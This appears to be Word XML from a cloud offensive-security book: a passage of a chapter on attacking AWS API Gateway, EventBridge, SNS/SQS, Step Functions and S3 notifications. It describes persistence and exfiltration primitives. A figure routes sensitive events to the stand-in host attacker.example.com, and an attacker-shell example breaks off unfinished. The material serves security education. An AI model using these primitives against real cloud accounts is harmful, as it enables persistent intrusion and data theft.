    <w:p w14:paraId="51049B50" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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EKS IRSA tokens and Pod Identity credentials are available directly inside the pod; RCE in the pod yields them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C72753" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> ConfigMap (or the newer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>eks:AssociateAccessPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) is the IAM-to-Kubernetes admin bridge; either path grants </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cluster-admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3C7E22" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ECR image-pull poisoning is a quiet supply-chain primitive; scanning does not block pull.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABFB62A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Chapter 14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Serverless and Event-Driven Architectures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC64F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Serverless and event-driven architectures — API Gateway in front of Lambda, EventBridge between services, SNS and SQS, Step Functions orchestrating business logic — expose surface area that looks small because no VMs run. It isn't. Each component has an IAM surface, each has a resource policy surface, and each connects to the others through event patterns that can be subverted as persistence or privilege-escalation primitives. This chapter treats the five canonical event-driven services — API Gateway, Event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Bridge, SNS, SQS, and Step Functions — with emphasis on the event-pattern subversion class of attacks, which have become dominant in mature cloud environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717A2D4C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>14.1  API Gateway: authorization and the IAM proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7728A71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API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Gateway sits in front of Lambda or an HTTP backend. Its authorization is one of: none (open), API key, IAM (SigV4), Lambda authorizer, Cognito user pools, or OIDC (HTTP APIs). The attack surface depends on which mode is configured. The common weakness is Lambda authorizers that return a cached </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Allow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> verdict for too-broad resource patterns. The authorizer's response is a policy document; if it returns </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Effect: Allow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>arn:aws:execute-api:*:*:*/*/*/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>(which many authorizers do to "simplify caching"), every path on every method is authorized for any requester who satisfies the authorizer's minimum check, for the duration of the cache window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9EAED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related API Gateway weakness is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS_IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> authorization mode combined with a resource policy that is overly permissive. If the API's resource policy allows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> principal, any AWS user in any account can SigV4-sign a request to the API. This is almost never what the organization intended; it is usually the result of copy-pasting from a tutorial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA547D6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>14.2  EventBridge: the attack that looks like plumbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC1DAB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EventBridge is the default event router in modern AWS stacks. A rule matches events on an event bus and sends them to one or more targets (Lambda, SNS, SQS, Step Functions, API destinations, other buses). The attacker-relevant primitives are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEFC58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PutRule + PutTargets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Creates a new rule that matches a pattern — for example, every CloudTrail API event for a specific identity — and sends the events to an attacker-controlled target. This is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CloudTrail-watching-through-EventBridge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> primitive: the attacker does not need </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cloudtrail:LookupEvents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>; they just subscribe to the live event stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A2809"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Cross-account event buses.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> EventBridge event buses have resource policies. An attacker with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>events:PutPermission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> can grant their own account the right to send events into the target bus, which is useful for poisoning downstream workflows. Conversely, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>events:PutTargets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a target in another account (supported since 2021) allows the attacker to ship events out of the target account on a schedule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135EA02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Schedulers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The EventBridge Scheduler service — distinct from event buses — runs schedules that invoke targets. A scheduled target that invokes a Lambda runs the Lambda under its execution role; if the attacker can create a schedule that invokes a sensitive Lambda, they have persistent invocation regardless of whether they can directly call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:InvokeFunction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30322167" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="2120680329"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Figure 14.1 — EventBridge persistence: the attacker's rule subscribes to high-value events and forwards them to a target under the attacker's control, surviving credential rotation in the victim's account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E383939" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="349919846"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Event sourc</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CloudTrail / S3 / custo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Default event bu</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default / custo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>m</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Attacker rul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>e</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pattern matches sensitive event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s</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API destinatio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>n</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https://attacker.example.com</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Why this is durable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The rule is resource-level; revoking the attacker's IAM principal does not delete the rule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The rule's IAM role is a separate identity unless the attacker chose one already in use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The rule pattern can be narrow enough to escape aggregate-anomaly detections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Defenders rarely enumerate EventBridge rules across all regions</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r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>• API destination secrets are held as Secrets Manager entries; rotating them rotates the attack channel, not the rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF7FA27" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>14.3  SNS and SQS resource-policy surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4477B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SNS topics and SQS queues have resource policies. An attacker with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sns:SetTopicAttributes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sqs:SetQueueAttributes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AddPermission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> variants) can grant their own account send, receive, or subscribe permissions. The critical angle is subscription: if an attacker subscribes their HTTPS endpoint to an SNS topic that carries sensitive events (for example, a customer-notification topic, or a monitoring topic that contains transaction data), they get every message in real time. SQS is similar: granting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ReceiveMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to an external account lets the attacker drain the queue from their side, potentially before the legitimate consumer has processed the message. This is a subtle class of data loss that resembles a bug rather than an attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B1A79B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>14.4  Step Functions and the state-machine pivot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7877D65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Step Functions orchestrate calls to other AWS services. Each state machine has an execution role. The attack primitives are: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>states:CreateStateMachine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a role that the attacker can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>states:UpdateStateMachine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to change an existing state machine's definition to inject attacker-owned states, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>states:StartExecution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run it. A state machine whose definition includes a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> state invoking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>arn:aws:states:::sts:assumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or an AWS SDK integration performing sensitive operations runs those operations under the state machine's execution role. This is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:UpdateFunctionCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'s cousin, at the workflow level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2867FE63" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>14.5  The S3-notification persistence primitive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3896E9D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Chapter 8 introduced </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutBucketNotification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a privilege-escalation primitive. It is equally a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> primitive. A notification that fires a Lambda on every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PutObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a target bucket gives the attacker continuous execution whenever data lands in the bucket — which may be many times per minute in a busy lake. If the Lambda's code is under attacker control and the bucket is heavily written, this is the closest AWS has to a persistent cron in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1094C634" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="420029073"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> notification.json &lt;&lt;EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3684731C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="420029073"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1240D82F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="420029073"/>
        <w:rPr>
          <w:lang w:val="en"/>
